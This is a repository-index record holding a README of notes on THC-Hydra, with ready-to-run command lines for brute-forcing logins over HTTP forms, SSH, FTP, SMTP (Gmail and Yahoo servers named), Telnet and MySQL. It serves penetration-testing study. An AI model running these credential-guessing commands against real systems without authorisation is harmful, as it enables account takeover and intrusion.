{"id":20134562,"url":"https://github.com/gnebbia/hydra_notes","last_synced_at":"2025-06-23T01:37:48.160Z","repository":{"id":51973074,"uuid":"144217304","full_name":"gnebbia/hydra_notes","owner":"gnebbia","description":"Some notes about Hydra for bruteforcing","archived":false,"fork":false,"pushed_at":"2020-03-11T20:47:16.000Z","size":43,"stargazers_count":173,"open_issues_count":2,"forks_count":31,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-01-13T09:27:26.845Z","etag":null,"topics":["hydra","notes","thc-hydra","tutorial"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gnebbia.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-08-10T00:33:44.000Z","updated_at":"2025-01-01T13:25:15.000Z","dependencies_parsed_at":"2022-08-27T02:28:21.542Z","dependency_job_id":null,"html_url":"https://github.com/gnebbia/hydra_notes","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gnebbia","download_url":"https://codeload.github.com/gnebbia/hydra_notes/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241581117,"owners_count":19985696,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hydra","notes","thc-hydra","tutorial"],"created_at":"2024-11-13T21:09:59.506Z","updated_at":"2025-03-02T22:28:04.158Z","avatar_url":"https://github.com/gnebbia.png","language":null,"readme":"# Hydra notes\n\nHydra is a very useful software when it comes to bruteforce credentials\non most commonly used protocols.\nWe are going to start with some flags which are generally used independently\nfrom the protocol, so in the examples when we will see these flags, we can\nimmediately understand what they are used for.\nHere is a list of common and general flags used with Hydra:\n\n* `-L \u003cfilepath\u003e` for the file path to use for usernames, separated by newlines\n* `-P \u003cfilepath\u003e` for the file path to use for passwords, separated by newlines\n* `-C \u003cfilepath\u003e` this is an alternative to -L and -P, since we can provide a unique file\n    which contains both user and password, separated by a colon, like\n    user1:passwdrandom\n    user2:minestrone\n    root:toor\n    ...\n* `-t \u003cinteger\u003e` is the number of threads to use\n* `-o \u003cfilepath\u003e` allows us to specify an output file where to save results\n* `-w \u003cinteger\u003e` specifies the amount of seconds two wait between consecutive\n    requests\n* `-s \u003cinteger\u003e` specifies the port number to use\n* `-v` activates the verbose mode, to give us an idea of what is happening\n    behind the scenes, so we will see each attempt, and the current combination\n    of credentials which is being tested\n* `-S` performs a connection using SSL\n* `-l \u003cusername\u003e` uses a single user for login instead of a list/file, so we can specify\n    instead of -L a single user with `-l root` or `-l usrname1`\n* `-M \u003cfilepath\u003e` with this option we can specify a file which will contain on\n    each line a different IP or website or resource, in order to perform \n    parallel cracking\n* `-f` this flag when activated, will let hydra terminate as soon as it finds a\n    single correct credential pair, so as soon as it succeeds it exits, this\n    happens per host if we specify -M (so a set of machines)\n* `-F` exits after the first found login/password pair for any host (for usage with -M)\n\n\n## HTTP\n\n\n### HTTP Basic Authentication\nWe can use the following commands for Basic HTTP Authentication, we can\nunderstand that the authentication is basic from the headers of the response.\n\n```sh\nhydra -L users.txt -P words.txt www.site.com http-head /private/\n# we provide users.txt as files containing users\n# then words.txt as the password file and then we try\n# a basic http authentication by using the http-head parameter\n# then we provide the page /private/ which is the url path\n# where we are asked for credentials\n```\n\nWe can add with -e combinations to the already existing combinations provided \nfrom the users and password files in particular we can use `n` or `s` or `r` \nor all the combinations of them, their meaning is:\n\n* `n` adds for each user also the null password\n* `s` adds the combination of credentials username/username for each of the\n    usernames\n* `r` adds for each combination username/password also the reversed\n    password/username\n\n```sh\nhydra -L users.txt -P words.txt www.site.com -e ns http-head /private/\n# here we do the same thing as before, but we add combinations with\n# `-e ns`, so we are also trying with an empty password for each\n# of the users and with passwords equal to the username for each user\n```\n\n\n### HTTP Digest Authentication\n\n```sh\nhydra -l root -P test.txt -vV localhost http-get /forbidden-d2\n# uses the username root with passwords from the file called test.txt\n# it runs in verbose mode on localhost through http-get module we specify\n# that this is an HTTP digest authentication found at path /forbidden-d2\n```\n\n```sh\nhydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /get_camera_params.cgi\n# uses the username admin with passwords from the file called\n# 1000_common_passwords.txt it runs on port 8090 through \n# the -f flag it will stop as soon as it finds the first valid credentials\n# the http-get module is specified to denote the presence of an HTTP digest\n# authentication at the path /get_camera_params.cgi\n```\n\n\n### HTTP Forms\n\nWhen it comes to HTTP login forms, we generally have to inspect the web\napplication, searching for messages which will appear on successful or failed\nlogins.\n\nGenerally for HTTP forms we will have hydra commands with the following\nstructure:\n\n```sh\nhydra -L \u003cusers_file\u003e -P \u003cpassword_file\u003e \u003curl\u003e http[s]-[post|get]-form \\\n\"index.php:param1=value1\u0026param2=value2\u0026user=^USER^\u0026pwd=^PASS^\u0026paramn=valn:[F|S]=messageshowed\"\n```\n\nWhere depending on the webpage and on the post we can have after url:\n* http-get-form, in case of an http page with a get form\n* https-get-form, in case of an https page with a get form\n* http-post-form, in case of an http page with a post form\n* https-post-form, in case of an https page with a post form\n\nand after this a string we specify the \"request string\" which will contain the\nfollowing elements separated by a colon `:`:\n* pageOnWhichTheLoginHappens\n* list of parameters, here we have to specify with ^USER^ and ^PASS^ where\n    usernames and passwords will be inserted\n* a character which may be F (for failing strings) or S for successful strings\n    followed by an equal sign `=` and a string which appears in a failed attempt\n    or in a successful attempt, if we do not specify F or S, F is the default\n    also because this is the more natural option, we generally know which\n    strings will appear when we fail a login but not the ones which will appear\n    when it is successful (unless we are dealing with a known web\n    technology/framework).\n    Let's see some examples, We can specify a failure string with `:F=mystringincaseoffailure`\n    while we can specify a success string with `:S=mystringincaseofsuccess`.\n    But we may also see online `:mystring` and it will be the equivalent of\n    `:F=mystring`\n\n\nLet's see some warmup examples:\n\n```sh\nhydra -l admin -P pass.txt https://url.com https-post-form \"index.php:param1=value123\u0026user=^USER^\u0026pass=^PASS^:F=Bad login\"\n # in this example we are in an https post form situation, \n # as we may notice as request line we have the following structure\n # page:parameters:F=message_to_show_in_case_of_failure\n```\n\n```sh\nhydra -l admin -P pass.txt https://url.com https-post-form \"index.php:param1=value123\u0026user=^USER^\u0026pass=^PASS^:S=Success!!\"\n # in this example we are in an https post form situation, \n # as we may notice as request line we have the following structure\n # page:parameters:S=message_to_show_in_case_of_failure\n```\n\n\n### HTTP Get Login Forms\n\n```sh\nhydra -l admin -P /root/Desktop/wordlists/test.txt http://www.website.com \\\nhttp-get-form \"/brute/index.php:username=^USER^\u0026password=^PASS^\u0026Login=Login:Username and/or password incorrect.\"\n```\n\n```sh\nhydra  -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/rockyou-40.txt \\\n  -e ns  -F  -u  -t 1  -w 10  -v  -V  192.168.1.44  http-get-form \\\n\"/DVWA/vulnerabilities/brute/:username=^USER^\u0026password=^PASS^\u0026Login=Login:S=Welcome to the password protected area:H=Cookie\\: security=low; PHPSESSID=${SESSIONID}\"\n```\n\n\n\n\n### HTTP Post Login Forms\n\n```sh\nhydra 192.168.1.69 http-post-form \"/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^\u0026pass=^PASS^:Bad login\" \\\n-L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt\n# Here we specified:\n # Host = 192.168.1.69\n # Method = http-form-post\n # URL = /w3af/bruteforce/form_login/dataReceptor.php\n # Form parameters = user=^USER^\u0026pass=^PASS^\n # Failure response = Bad login\n # Users file = users.txt\n # Password file = pass.txt\n # Threads = -t 10\n # Wait for timeout = -w 30\n # Output file = -o hydra-http-post-attack.txt\n```\n\nWe can make more complicated examples, for example by specifying specific\nheaders or cookies with:\n\n```sh\nhydra 192.168.1.69 http-post-form \"/foo.php:user=^USER^\u0026pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo\" \\\n-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt\n # in this case we specify that the cookie should be page/cookie\n # cookies can be specified with C=\n # and we also added an header with H= \n # this header is called X-Foo and has as value Foo\n```\n\n\n```sh\nhydra -L users.txt -P words.txt https://www.site.com  https-post-form \"/index.cgi:login\u0026name=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed\" \u0026\n # here we use https-post-form, since the website uses https\n```\n\n\n```sh\nhydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^\u0026pwd=^PASS^\u0026wp-submit=Log In\u0026testcookie=1:S=Location'\n# now we check for success by using S=Location, since wordpress uses a Location\n# header to redirect the user, we can think about S as a sort of grep applied to\n# the HTTP response\n```\n\n## SMTP\n\n```sh\nhydra smtp.victimsemailserver.com smtp -l useraccount@gmail.com -P '/root/Desktop/rockyou.txt' -s portnumber -S -v \n```\nGenerally the port used for SMTP is 465 and common SMTP server for common email\nservices are:\n    * smtp.mail.yahoo.com\n    * smtp.gmail.com\n    * smtp.live.com (but on poort 587)\n\n\n## Telnet\n\n```sh\nhydra -l \u003cusername\u003e -P \u003cpassword_file\u003e telnet://targetname\n```\n\n## SSH\n\n```sh\nhydra -l root -M /path/to/ip/list.txt -P /path/to/passwordlist.txt ssh -t 4\n```\nNotice that with some services, we may need to use the recommended\nnumber of tasks. In case of SSH if we use more than 4 tasks we may get\nerrors.\n\n```sh\nhydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e ns -t 10\n # this will attack the system 192.168.1.26 on port 22\n # and will use as password file pass.txt while\n # for users the file users.txt\n # the process will use 10 threads at a time\n```\n\n\n```sh\nhydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123\n```\n\n```sh\nhydra -L logins.txt -P pws.txt -M targets.txt ssh\n# tries the users from logins.txt and the paasswords from pws.txt\n# on all the machines listed on targests.txt on the ssh port/service\n```\n\n\n## FTP \n\n```sh\nhydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp\n```\n\n\n```sh\nhydra -l user -P passlist.txt ftp://192.168.0.1\n```\n\n## MySQL and other databases\n\nWe can use hydra with many kinds of databases, anyway it is very important for\nus to check that we have installed hydra with the adequate module to perform a\nspecific bruteforce.\n\n**IMPORTANT**: if we did not install hydra with mysql5 support it will not work,\nwe can check the modules available by issuing a `hydra -h`, if we just see\n`mysql(v4)` this means that our version will not be compatible with `mysql5`,\nwhile if we see `mysql` then our version of hydra will be compatible also with\nmysql5 databases.\n\n```sh\nhydra -L \u003cyour_username_file\u003e -P \u003cyour_password_file\u003e \u003cIP\u003e mysql -s 3306 -o output.txt\n```\nnotice that this is equivalent to:\n\n```sh\nhydra -L \u003cyour_username_file\u003e -P \u003cyour_password_file\u003e \u003cIP\u003e mysql -o output.txt\n # by default mysql uses port 3306 so we do not need to specify it,\n # anyway it is fundamental to specify it if the mysql port is different\n```\n\n\n## Appendix A: Sending Hydra traffic through Proxy\n\n\nIt is often useful to analyze what we are actually doing with hydra, to this\npurpose we can send the traffic to an intercepting proxy such as Burp.\n\nTo do this, we just have to set an environment variable:\n```sh\nexport HYDRA_PROXY=http://127.0.0.1:8080\n# or\nexport HYDRA_PROXY_HTTP=http://127.0.0.1:8080 \n```\n\nFrom `hydra -v` we can indeed read:\n```sh\nUse HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.\nE.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)\n     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)\n     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080\n     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)\n```\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgnebbia%2Fhydra_notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgnebbia%2Fhydra_notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgnebbia%2Fhydra_notes/lists"}